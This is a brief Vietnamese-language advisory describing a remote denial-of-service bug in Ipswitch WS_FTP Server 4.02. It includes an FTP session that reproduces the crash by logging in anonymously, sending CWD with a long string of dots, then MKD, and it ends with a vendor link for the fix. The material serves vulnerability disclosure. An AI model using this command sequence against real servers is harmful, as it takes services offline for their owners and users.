Phiên bản : WS_FTP Server
Version 4.02
Tóm tắt : WS_FTP Server được phát triển bởi
Ipswitch , nó là một FTP Server dành cho Windows NT và Windows 2000 . Trong
phiên bải 4.02 xay ra một lỗi cho phép tấn công từ chối dịch vụ từ xa . Một
account hợp lệ trên Server có thể khai thác lỗi này ( thậm chí với account :
Anonymous )
Chi tiết :
Ta kết nối đến 1 WS_FTP Server 4.02 :
ftp 203.162.x.x
220-zaki X2 WS_FTP Server 4.0.2.EVAL (54328827)
220-Tue Dec 16 03:36:28 2003
220-29 days remaining on evaluation.
220 zaki X2 WS_FTP Server 4.0.2.EVAL (54328827)
user anonymous
pass test@security.com.vn // đăng nhập với account " Anonymous
230 user logged in //
pwd // Kiểm tra xem mình đang năm ở thư mục nào
257 "/users/root" is current directory
cwd .............. // sử dụng command CWD nguyên nhân gây ra tình trạng CASH
250 CWD successful
pwd
257 "/users/root/.............." is current directory
mkd a // <=== Cash WS_FTP Server
Lúc này CPU sẽ gây ra tình trạng CASH đối với WS_FTP Server và từ chối mọi
dịch vụ .
Giải Pháp : các bạn có thể tìm cách fix lỗi tại đây :
http://www.ipswitch.com/Products/WS_FTP-Server/index.html